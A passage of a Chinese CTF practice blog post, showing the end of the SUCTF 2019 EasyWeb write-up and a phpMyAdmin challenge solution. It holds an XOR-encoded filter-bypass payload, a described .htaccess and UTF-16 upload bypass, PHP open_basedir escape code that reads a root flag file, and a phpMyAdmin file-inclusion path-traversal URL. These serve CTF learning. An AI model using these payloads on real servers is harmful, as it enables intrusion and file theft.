<h3 id="绕过函数触发限制"><a href="#绕过函数触发限制" class="headerlink" title="绕过函数触发限制"></a>绕过函数触发限制</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">preg_match(&#39;&#x2F;[\x00- 0-9A-Za-z\&#39;&quot;\&#96;~_&amp;.,|&#x3D;[\x7F]+&#x2F;i&#39;, $hhh)</span><br></pre></td></tr></table></figure>
<p>这里过滤了可见字符。所以可以用异或绕过。<br>由于有长度限制我们只能做一个GET执行get_the_flag。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?_&#x3D;$&#123;%80%80%80%80^%df%c7%c5%d4&#125;&#123;%d4&#125;();&amp;%d4&#x3D;get_the_flag</span><br></pre></td></tr></table></figure>

<h3 id="绕过文件上传限制"><a href="#绕过文件上传限制" class="headerlink" title="绕过文件上传限制"></a>绕过文件上传限制</h3><p>文件上传首先限定了文件名，不能上传ph开头的扩展名。然后限制了文件内容不能包含&lt;?，<br>这样一是不能直接上传以php为扩展名的文件，二是不能上传含有&lt;?的文本文件。三是他会判断上传的是否为图片文件。<br>这里是没有限止上传htaccess文件的。所以可以使用htaccess突破上传。<br>然后使用utf-16突破&lt;?文件内容限制。<br>最后对文件添加伪图片信息头。</p>
<h3 id="构造语句"><a href="#构造语句" class="headerlink" title="构造语句"></a>构造语句</h3><p>这题限制了目录所以用如下办法绕过限制</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ini_set(&quot;open_basedir&quot;,&quot;..&quot;);chdir(&quot;..&quot;);chdir(&quot;..&quot;);chdir(&quot;..&quot;);chdir(&quot;..&quot;);chdir(&quot;..&quot;);ini_set(&quot;open_basedir&quot;,&quot;&#x2F;&quot;);var_dump(scandir(&quot;&#x2F;&quot;));</span><br></pre></td></tr></table></figure>
<p>看到根目录下有个THis_Is_tHe_F14g,把他显示出来</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ini_set(&quot;open_basedir&quot;,&quot;..&quot;);chdir(&quot;..&quot;);chdir(&quot;..&quot;);chdir(&quot;..&quot;);chdir(&quot;..&quot;);chdir(&quot;..&quot;);ini_set(&quot;open_basedir&quot;,&quot;&#x2F;&quot;);readfile(&quot;&#x2F;THis_Is_tHe_F14g&quot;);</span><br></pre></td></tr></table></figure>
<p>这里记录一下，可以用的函数有highlight_file,file_get_contents,readfile<br>拿到flag<br><img src="EasyWeb.png" alt=""></p>
<h2 id="我有一个数据库"><a href="#我有一个数据库" class="headerlink" title="我有一个数据库"></a>我有一个数据库</h2><p>一个空页面啥也没有。拿出dirsearch扫描一下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 dirsearch.py -u http:&#x2F;&#x2F;1a6d0fd6-6ea5-43b2-bb83-7b2dfdf5fb2d.node3.buuoj.cn&#x2F; -e * -s 0.1 -t 2</span><br></pre></td></tr></table></figure>
<p><img src="database.png" alt=""><br>扫到phpmyadmin，网上查了一下。phpmyadmin任意文件包含漏洞。直接利用一下。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;1a6d0fd6-6ea5-43b2-bb83-7b2dfdf5fb2d.node3.buuoj.cn&#x2F;phpmyadmin&#x2F;?target&#x3D;db_sql.php%253f&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;..&#x2F;flag</span><br></pre></td></tr></table></figure>
<p>这里的%253f是通过两次URL编码的?我测试直接使用?也能成功。<br>不知道为什么要转几次。</p>

    </div>

    
    
    
        <div class="reward-container">
  <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/file/weixin.png" alt="粗制乱造 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/file/zfb.png" alt="粗制乱造 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
              <a href="/tags/%E7%BB%83%E4%B9%A0%E9%A2%98/" rel="tag"># 练习题</a>
              <a href="/tags/CTF%E8%AF%BE/" rel="tag"># CTF课</a>
              <a href="/tags/WEB/" rel="tag"># WEB</a>
              <a href="/tags/%E9%BB%91%E7%9B%92%E6%B5%8B%E8%AF%95/" rel="tag"># 黑盒测试</a>
              <a href="/tags/RCE/" rel="tag"># RCE</a>
              <a href="/tags/CVE/" rel="tag"># CVE</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/Python-python3-one/" rel="prev" title="Python入门指南(学习笔记一)">
      <i class="fa fa-chevron-left"></i> Python入门指南(学习笔记一)
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/jxsw_dbw_web_6/" rel="next" title="WEB复习（大比武_CTF课_第六天）">
      WEB复习（大比武_CTF课_第六天） <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#CTF做题思路与工具使用"><span class="nav-number">2.</span> <span class="nav-text">CTF做题思路与工具使用</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#CTF题型"><span class="nav-number">2.1.</span> <span class="nav-text">CTF题型</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CTF工具使用"><span class="nav-number">2.2.</span> <span class="nav-text">CTF工具使用</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#黑盒——信息搜集"><span class="nav-number">2.2.1.</span> <span class="nav-text">黑盒——信息搜集</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#dirsearch"><span class="nav-number">2.2.1.1.</span> <span class="nav-text">dirsearch</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#CTF常用字典"><span class="nav-number">2.2.1.2.</span> <span class="nav-text">CTF常用字典</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#文件泄露利用工具"><span class="nav-number">2.2.1.3.</span> <span class="nav-text">文件泄露利用工具</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#黑盒——漏洞攻击篇"><span class="nav-number">2.2.1.4.</span> <span class="nav-text">黑盒——漏洞攻击篇</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#RCE深入学习"><span class="nav-number">3.</span> <span class="nav-text">RCE深入学习</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#无数字字母RCE"><span class="nav-number">3.1.</span> <span class="nav-text">无数字字母RCE</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#函数的动态调用"><span class="nav-number">3.1.1.</span> <span class="nav-text">函数的动态调用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#字符的取反"><span class="nav-number">3.1.2.</span> <span class="nav-text">字符的取反</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#寻找可利用函数"><span class="nav-number">3.1.3.</span> <span class="nav-text">寻找可利用函数</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#绕过disable-functions"><span class="nav-number">3.2.</span> <span class="nav-text">绕过disable_functions</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#利用LD-PRELOAD"><span class="nav-number">3.2.1.</span> <span class="nav-text">利用LD_PRELOAD</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#工具"><span class="nav-number">3.2.1.1.</span> <span class="nav-text">工具</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#做题"><span class="nav-number">4.</span> <span class="nav-text">做题</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#2019-Love-Math"><span class="nav-number">4.1.</span> <span class="nav-text">2019 Love Math</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#base-convert"><span class="nav-number">4.1.1.</span> <span class="nav-text">base_convert</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#hex2bin"><span class="nav-number">4.1.2.</span> <span class="nav-text">hex2bin</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#dechex"><span class="nav-number">4.1.3.</span> <span class="nav-text">dechex</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#SUCTF-2019-EasyWeb"><span class="nav-number">4.2.</span> <span class="nav-text">[SUCTF 2019] EasyWeb</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#绕过函数触发限制"><span class="nav-number">4.2.1.</span> <span class="nav-text">绕过函数触发限制</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#绕过文件上传限制"><span class="nav-number">4.2.2.</span> <span class="nav-text">绕过文件上传限制</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#构造语句"><span class="nav-number">4.2.3.</span> <span class="nav-text">构造语句</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#我有一个数据库"><span class="nav-number">4.3.</span> <span class="nav-text">我有一个数据库</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="粗制乱造"
      src="/file/avatar.png">
  <p class="site-author-name" itemprop="name">粗制乱造</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">43</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">37</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">59</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">粗制乱造</span>
</div>
  <div class="powered-by">由 <a href="https://czlz.net/" class="theme-link">czlz.net</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
